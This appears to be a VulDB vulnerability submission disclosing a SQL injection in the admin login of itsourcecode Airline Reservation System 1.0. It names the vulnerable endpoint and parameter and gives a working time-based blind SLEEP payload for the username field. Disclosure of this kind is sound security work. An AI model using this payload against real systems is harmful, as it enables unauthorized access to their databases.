| 标题 | itsourcecode Airline Reservation System 1.0 SQLi |
|---|
| 描述 | On the /admin/login.php page, users enter their username and password for login verification. By capturing the request, it was found that the verification interface is /admin/ajax.php?action=login. By locating the method corresponding to the login action and analyzing it, it was discovered that in the admin/admin_class.php page, the filtering of the username and password fields is insufficient, leading to SQL injection vulnerabilities. The same issue also occurs in the login2() method.
————POC——————
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=root' AND (SELECT 9673 FROM (SELECT(SLEEP(5)))bZXm) AND 'aMFp'='aMFp&password=Aa12345^ |
|---|
| 来源 | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE1-3.md |
|---|
| 用户 | quad (UID 73025) |
|---|
| 提交 | 2024-08-05 10時03分 (2 年前) |
|---|
| 管理 | 2024-08-05 17時45分 (8 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 273624 [itsourcecode Airline Reservation System 1.0 Admin Login Page /admin/login.php login/login2 用户名 SQL注入] |
|---|
| 积分 | 20 |
|---|